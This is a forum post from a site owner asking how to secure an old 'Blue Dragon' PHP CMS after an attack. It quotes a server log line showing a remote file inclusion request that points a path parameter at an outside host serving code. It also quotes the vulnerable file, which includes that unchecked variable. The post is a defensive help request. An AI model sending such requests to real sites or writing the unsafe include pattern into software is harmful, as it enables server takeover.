|
|
Posted by salonowiec on 02/02/08 11:47
My admin notified me that my site is closed till the eror is removed. My CMS
is PHPBlue Dragon (pretty old). The attack was like this (found in logs):
d198-53-20-215.abhsia.telus.net kurpiel.pl -
[01/Feb/2008:19:44:06 +0100] "GET
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt?
HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
..NET CLR 1.1.4322)"
The above mentioned activecontent.php is:
<?php
/***************************************************************************
* Blue Dragon CMS Platinum
* ------------------------------------
*
* script file id : activecontent.php
* begin platinum : 2004/03/01
* copyright : (C) 2003 Apache
*
* file platinum ver : 1.0
*
* This source file is part of the "Blue Dragon CMS Platinum"(Content
Management System).
*
* This file may be distributed and/or modified under the terms of the
* "Blue Dragon CMS Platinum License" version 2 as published by the
software author.
*
* This file is provided AS IS with NO WARRANTY!
**************************************************************************/
include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>Can I - rather ignorant in php - modify the file to make it hackerresistant? Many thanks
Navigation:
[Reply to this message]
|